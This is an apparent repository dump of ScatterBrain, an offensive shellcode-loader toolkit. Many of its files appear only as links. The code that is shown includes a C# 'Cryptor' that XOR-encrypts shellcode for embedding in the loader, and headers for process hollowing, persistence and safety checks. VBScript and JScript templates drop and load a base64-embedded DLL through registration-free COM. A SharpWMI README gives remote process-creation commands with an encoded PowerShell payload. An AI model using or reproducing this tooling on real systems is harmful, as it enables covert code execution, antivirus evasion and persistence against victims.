├── DWELLS
├── DWELLS.h
├── stdafx.h
├── DWELLS.cpp
├── Resource.rc
├── dllmain.cpp
├── stdafx.cpp
├── targetver.h
├── resource.h
├── DWELLS.vcxproj.filters
└── DWELLS.vcxproj
├── ScatterBrain
├── CheckPlease.h
├── Yes
├── stdafx.h
├── ChatApplications.h
├── WindowsSecurity.h
├── dllmain.cpp
├── stdafx.cpp
├── targetver.h
├── scatterbrain.cpp
├── Persistence.h
├── Executables.h
├── CertificateTrust.h
├── Browsers.h
├── RegistryHelpers.h
├── Helpers.h
├── scatterbrain.h
├── WindowsSecurity.cpp
├── ChatApplications.cpp
├── ScatterBrain.vcxproj.filters
├── Browsers.cpp
├── RegistryHelpers.cpp
├── Executables.cpp
├── Persistence.cpp
├── Helpers.cpp
├── ScatterBrain.vcxproj
├── HijackStubs.h
└── HijackStubs.cpp
├── images
├── hxd_copy.png
├── hxd_open.png
├── ex_execution.png
├── safetychecks.png
├── walkthrough.png
└── scatterbrain_rawdata_paste.png
├── SharpWMI
├── SharpWMI
│ ├── app.config
│ ├── Properties
│ │ ├── AssemblyInfo.cs
│ │ ├── Resources.Designer.cs
│ │ └── Resources.resx
│ ├── SharpWMI.csproj
│ └── Program.cs
├── SharpWMI.sln
├── LICENSE
└── README.md
├── Cryptor
├── Properties
│ └── AssemblyInfo.cs
├── Program.cs
└── Cryptor.csproj
├── AccessibilityFeaturesPersistence
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
├── AccessibilityFeaturesPersistence.csproj
└── Program.cs
├── regfree_com_activation_templates
├── vbscript.vbs
├── jscript.js
└── wmi.ps1
├── .gitattributes
├── .gitignore
├── ScatterBrain.sln
└── README.md
/DWELLS/DWELLS.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | void Muntz();
--------------------------------------------------------------------------------
/DWELLS/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/stdafx.h
--------------------------------------------------------------------------------
/ScatterBrain/CheckPlease.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
4 | BOOL SafeToExecute();
--------------------------------------------------------------------------------
/ScatterBrain/Yes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/Yes
--------------------------------------------------------------------------------
/DWELLS/DWELLS.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/DWELLS.cpp
--------------------------------------------------------------------------------
/DWELLS/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/Resource.rc
--------------------------------------------------------------------------------
/DWELLS/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/dllmain.cpp
--------------------------------------------------------------------------------
/DWELLS/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/stdafx.cpp
--------------------------------------------------------------------------------
/DWELLS/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/targetver.h
--------------------------------------------------------------------------------
/images/hxd_copy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/hxd_copy.png
--------------------------------------------------------------------------------
/images/hxd_open.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/hxd_open.png
--------------------------------------------------------------------------------
/ScatterBrain/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/stdafx.h
--------------------------------------------------------------------------------
/ScatterBrain/ChatApplications.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
4 | wchar_t* GetChatApplication();
--------------------------------------------------------------------------------
/ScatterBrain/WindowsSecurity.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include "stdafx.h"
4 |
5 | bool IsHighIntegrity();
--------------------------------------------------------------------------------
/ScatterBrain/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/dllmain.cpp
--------------------------------------------------------------------------------
/ScatterBrain/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/stdafx.cpp
--------------------------------------------------------------------------------
/ScatterBrain/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/targetver.h
--------------------------------------------------------------------------------
/images/ex_execution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/ex_execution.png
--------------------------------------------------------------------------------
/images/safetychecks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/safetychecks.png
--------------------------------------------------------------------------------
/images/walkthrough.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/walkthrough.png
--------------------------------------------------------------------------------
/ScatterBrain/scatterbrain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/scatterbrain.cpp
--------------------------------------------------------------------------------
/ScatterBrain/Persistence.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
4 | bool IsHostPersistenceHost();
5 | void InitializeBootProceedure();
--------------------------------------------------------------------------------
/images/scatterbrain_rawdata_paste.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/scatterbrain_rawdata_paste.png
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ScatterBrain/Executables.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include "stdafx.h"
4 | #include
5 |
6 | wchar_t* GetValidExecutable();
7 | int FindRetGadget(wchar_t*, void**, int);
--------------------------------------------------------------------------------
/ScatterBrain/CertificateTrust.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
4 | BOOL HasValidSignature(PWCHAR, WCHAR*);
5 | BOOL VerifyAuthenticodeSignature(PWCHAR, LPCTSTR);
6 | //BOOL GetCertificateInformation(PWCHAR);
--------------------------------------------------------------------------------
/ScatterBrain/Browsers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 | #include
4 |
5 | wchar_t* GetGoogleChromePath();
6 | wchar_t* GetGoogleChromeSxSPath();
7 | wchar_t* GetFireFoxPath();
8 | wchar_t* GetDefaultBrowser();
--------------------------------------------------------------------------------
/ScatterBrain/RegistryHelpers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 | #include
4 |
5 | std::wstring GetStringValueFromHKCU(const std::wstring&, const std::wstring&);
6 | std::wstring GetStringValueFromHKCR(const std::wstring&, const std::wstring&);
7 | std::wstring GetStringValueFromHKLM(const std::wstring&, const std::wstring&);
--------------------------------------------------------------------------------
/ScatterBrain/Helpers.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 | #include
4 | using namespace std;
5 |
6 | void TranslateVolumeToPath(LPCWSTR, WCHAR*);
7 | bool FileExistsAndIs64Bit(char*);
8 | bool FileExistsAndIs64Bit(wchar_t*);
9 | wchar_t* CharToWcharT(char*);
10 | void rtrimws(string&);
11 | void rtrimws(wstring&);
12 | //wchar_t* GetDefaultHandlerForExtension(LPCTSTR);
--------------------------------------------------------------------------------
/DWELLS/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 | //
5 | #define IDR_DATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpWMI", "SharpWMI\SharpWMI.csproj", "{6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Cryptor/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Cryptor")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Cryptor")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d3cb84ff-065e-4f2b-8c35-e5ca0103eab5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpWMI")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpWMI")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6dd22880-dac5-4b4d-9c91-8c35cc7b8180")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpWMI/LICENSE:
--------------------------------------------------------------------------------
1 | SharpWMI is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2018, Will Schroeder
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AccessibilityFeaturesPersistence")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AccessibilityFeaturesPersistence")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("558cf1e0-1983-4bf3-81ce-961058ace7c0")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Cryptor/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 |
7 | namespace Cryptor
8 | {
9 | class Program
10 | {
11 | static byte[] XorByteArray(byte[] origBytes, char[] cryptor)
12 | {
13 | byte[] result = new byte[origBytes.Length];
14 | int j = 0;
15 | for (int i = 0; i < origBytes.Length; i++)
16 | {
17 | if (j == cryptor.Length - 1)
18 | {
19 | j = 0;
20 | }
21 | byte res = (byte)(origBytes[i] ^ Convert.ToByte(cryptor[j]));
22 | result[i] = res;
23 | j += 1;
24 | }
25 | return result;
26 | }
27 |
28 | static void Main(string[] args)
29 | {
30 | if (args.Length != 1)
31 | {
32 | Console.WriteLine("ERROR: Need to pass only the path to the shell code file to encrypt.");
33 | Environment.Exit(1);
34 | }
35 | if (!File.Exists(args[0]))
36 | {
37 | Console.WriteLine("Could not find path to shellcode bin file: {0}", args[0]);
38 | Environment.Exit(1);
39 | }
40 | byte[] shellcodeBytes = File.ReadAllBytes(args[0]);
41 | char[] cryptor = new char[] { 'S', 'e', 'c', 'r', 'e', 't', 'K', 'e', 'y', '\0' };
42 | byte[] encShellcodeBytes = XorByteArray(shellcodeBytes, cryptor);
43 | File.WriteAllBytes("encrypted.bin", encShellcodeBytes);
44 | Console.WriteLine("Wrote encoded binary to encrypted.bin. View it in HxD and copy to RawData.h of ScatterBrain.");
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/ScatterBrain/scatterbrain.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #ifndef SCATTERBRAIN_H_
3 | #define SCATTERBRAIN_H_
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | using namespace std;
10 |
11 | int detonate();
12 | int MonsterMind();
13 |
14 |
15 | // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684280(v=vs.85).aspx
16 | typedef NTSTATUS(WINAPI* _NtQueryInformationProcess)(
17 | _In_ HANDLE ProcessHandle,
18 | _In_ PROCESSINFOCLASS ProcessInformationClass,
19 | _Out_ PVOID ProcessInformation,
20 | _In_ ULONG ProcessInformationLength,
21 | _Out_opt_ PULONG ReturnLength
22 | );
23 |
24 | // https://msdn.microsoft.com/en-us/library/windows/hardware/ff567119(v=vs.85).aspx
25 | typedef NTSTATUS(WINAPI* _ZwUnmapViewOfSection)(
26 | _In_ HANDLE ProcessHandle,
27 | _In_opt_ PVOID BaseAddress
28 | );
29 |
30 | typedef struct BASE_RELOCATION_BLOCK {
31 | DWORD PageAddress;
32 | DWORD BlockSize;
33 | } BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
34 |
35 | typedef struct BASE_RELOCATION_ENTRY {
36 | USHORT Offset : 12;
37 | USHORT Type : 4;
38 | } BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
39 |
40 | struct PE_FILE
41 | {
42 | size_t size_ids{};
43 | size_t size_dos_stub{};
44 | size_t size_inh32{};
45 | size_t size_ish{};
46 | size_t size_sections{};
47 | IMAGE_DOS_HEADER ids;
48 | std::vector MS_DOS_STUB;
49 | IMAGE_NT_HEADERS64 inh32;
50 | std::vector ish;
51 | std::vector> Sections;
52 | void set_sizes(size_t, size_t, size_t, size_t, size_t);
53 | };
54 |
55 | struct LOADED_IMAGE64
56 | {
57 | PIMAGE_NT_HEADERS64 FileHeader;
58 | ULONG NumberOfSections;
59 | PIMAGE_SECTION_HEADER Sections;
60 | };
61 | #endif
--------------------------------------------------------------------------------
/ScatterBrain/WindowsSecurity.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 |
4 | bool IsHighIntegrity()
5 | {
6 | HANDLE hToken;
7 | HANDLE hProcess;
8 |
9 | DWORD dwLengthNeeded;
10 | DWORD dwError = ERROR_SUCCESS;
11 |
12 | PTOKEN_MANDATORY_LABEL pTIL = NULL;
13 | LPWSTR pStringSid;
14 | DWORD dwIntegrityLevel;
15 |
16 | hProcess = GetCurrentProcess();
17 | if (OpenProcessToken(hProcess, TOKEN_QUERY |
18 | TOKEN_QUERY_SOURCE, &hToken))
19 | {
20 | // Get the Integrity level.
21 | if (!GetTokenInformation(hToken, TokenIntegrityLevel,
22 | NULL, 0, &dwLengthNeeded))
23 | {
24 | dwError = GetLastError();
25 | if (dwError == ERROR_INSUFFICIENT_BUFFER)
26 | {
27 | pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(0,
28 | dwLengthNeeded);
29 | if (pTIL != NULL)
30 | {
31 | if (GetTokenInformation(hToken, TokenIntegrityLevel,
32 | pTIL, dwLengthNeeded, &dwLengthNeeded))
33 | {
34 | dwIntegrityLevel = *GetSidSubAuthority(pTIL->Label.Sid,
35 | (DWORD)(UCHAR)(*GetSidSubAuthorityCount(pTIL->Label.Sid) - 1));
36 |
37 | if (dwIntegrityLevel < SECURITY_MANDATORY_MEDIUM_RID)
38 | {
39 | // Low Integrity
40 | wprintf(L"[*] Low Process\n");
41 | return FALSE;
42 | }
43 | else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
44 | dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
45 | {
46 | // Medium Integrity
47 | wprintf(L"[*] Medium Process\n");
48 | return FALSE;
49 | }
50 | else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
51 | {
52 | // High Integrity
53 | wprintf(L"[*] High Integrity Process\n");
54 | return TRUE;
55 | }
56 | }
57 | LocalFree(pTIL);
58 | }
59 | }
60 | }
61 | CloseHandle(hToken);
62 | }
63 | return FALSE;
64 | }
--------------------------------------------------------------------------------
/DWELLS/DWELLS.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Resource Files
45 |
46 |
47 |
48 |
49 | Resource Files
50 |
51 |
52 |
--------------------------------------------------------------------------------
/regfree_com_activation_templates/vbscript.vbs:
--------------------------------------------------------------------------------
1 | Function decodeBase64(base64)
2 | dim DM, EL
3 | Set DM = CreateObject("Microsoft.XMLDOM")
4 | ' Create temporary node with Base64 data type
5 | Set EL = DM.createElement("tmp")
6 | EL.DataType = "bin.base64"
7 | ' Set encoded String, get bytes
8 | EL.Text = base64
9 | decodeBase64 = EL.NodeTypedValue
10 | End Function
11 |
12 | Function RandomString(ByVal strLen)
13 | Dim str, min, max
14 |
15 | LETTERS = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9")
16 | Randomize
17 | For i = 1 To strLen
18 | str = str & LETTERS(Int(UBound(LETTERS) * Rnd))
19 | Next
20 | RandomString = str
21 | End Function
22 |
23 | Sub writeBytes(file, bytes)
24 | Dim binaryStream
25 | Const TypeBinary = 1
26 | Const ForReading = 1, ForWriting = 2, ForAppending = 8
27 | Set binaryStream = CreateObject("ADODB.Stream")
28 | binaryStream.Type = TypeBinary
29 | 'Open the stream and write binary data
30 | binaryStream.Open
31 | binaryStream.Write bytes
32 | 'Save binary data to disk
33 | binaryStream.SaveToFile file, ForWriting
34 | End Sub
35 |
36 |
37 | fileName = RandomString(12) + "." + RandomString(3)
38 | classObj = RandomString(12)
39 | manifest = " "
40 | Set SFSO = CreateObject("Scripting.FileSystemObject")
41 | dropPath = SFSO.GetSpecialFolder(2)
42 | dynwrapX = "B64_DLL_BYTES_GO_HERE"
43 |
44 |
45 | dynwrapXBytes = decodeBase64(dynwrapX)
46 | finalPath = dropPath + "\" + fileName
47 | writeBytes finalPath, dynwrapXBytes
48 |
49 |
50 | Set ax = CreateObject("Microsoft.Windows.ActCtx")
51 | ax.ManifestText = manifest
52 |
53 | Set DWX = ax.CreateObject(classObj)
54 |
--------------------------------------------------------------------------------
/SharpWMI/README.md:
--------------------------------------------------------------------------------
1 | # SharpWMI
2 |
3 | ----
4 |
5 | SharpWMI is a C# implementation of various WMI functionality. This includes local/remote WMI queries, remote WMI process creation through win32_process, and remote execution of arbitrary VBS through WMI event subscriptions. Alternate credentials are also supported for remote methods.
6 |
7 | [@harmj0y](https://twitter.com/harmj0y) is the primary author.
8 |
9 | SharpWMI is licensed under the BSD 3-Clause license.
10 |
11 | ## Usage
12 |
13 | Local system enumeration :
14 | SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
15 |
16 | Remote system enumeration :
17 | SharpWMI.exe action=query computername=HOST1[,HOST2,...] query="select * from win32_service" [namespace=BLAH]
18 |
19 | Remote process creation :
20 | SharpWMI.exe action=create computername=HOST[,HOST2,...] command="C:\temp\process.exe [args]"
21 |
22 | Remote VBS execution :
23 | SharpWMI.exe action=executevbs computername=HOST[,HOST2,...] [eventname=blah]
24 |
25 | Note: Any remote function also takes an optional "username=DOMAIN\user" "password=Password123!"
26 |
27 | Examples:
28 |
29 | SharpWMI.exe action=query query="select * from win32_process"
30 | SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\SecurityCenter2"
31 | SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
32 | SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
33 | SharpWMI.exe action=create computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
34 | SharpWMI.exe action=executevbs computername=primary.testlab.local
35 | SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\harmj0y" password="Password123!"
36 |
37 |
38 | ## Compile Instructions
39 |
40 | We are not planning on releasing binaries for SharpWMI, so you will have to compile yourself :)
41 |
42 | SharpWMI has been built against .NET 3.5 and is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Simply open up the project .sln, choose "release", and build.
43 |
--------------------------------------------------------------------------------
/regfree_com_activation_templates/jscript.js:
--------------------------------------------------------------------------------
1 | var fileName = 'testfile.tmp';
2 | var classObj = 'coolObjectName';
3 | var manifest = ' ';
4 | var fso = new ActiveXObject("Scripting.FileSystemObject");
5 | var dropPath = fso.GetSpecialFolder(2);
6 |
7 | var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.charAt(A)+Base64.characters.charAt(o)+Base64.characters.charAt(B)}while(c>>16&255,e=a>>>8&255,n=255&a,h[d/4]=String.fromCharCode(t,e,n),64==i&&(h[d/4]=String.fromCharCode(t,e)),64==o&&(h[d/4]=String.fromCharCode(t));return r=h.join("")}
10 | function binaryWriter(res,filename)
11 | {var base64decoded=Magic(res);var TextStream=new ActiveXObject('ADODB.Stream');TextStream.Type=2;TextStream.charSet='iso-8859-1';TextStream.Open();TextStream.WriteText(base64decoded);var BinaryStream=new ActiveXObject('ADODB.Stream');BinaryStream.Type=1;BinaryStream.Open();TextStream.Position=0;TextStream.CopyTo(BinaryStream);BinaryStream.SaveToFile(filename,2);BinaryStream.Close()}
12 |
13 | var dynwrapX = 'B64DLL_BYTES_GO_HERE';
14 |
15 | binaryWriter(dynwrapX,dropPath+"\\" + fileName);
16 |
17 |
18 | var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
19 | ax.ManifestText = manifest;
20 |
21 | var DWX = ax.CreateObject(classObj);
22 |
--------------------------------------------------------------------------------
/Cryptor/Cryptor.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}
8 | Exe
9 | Cryptor
10 | Cryptor
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
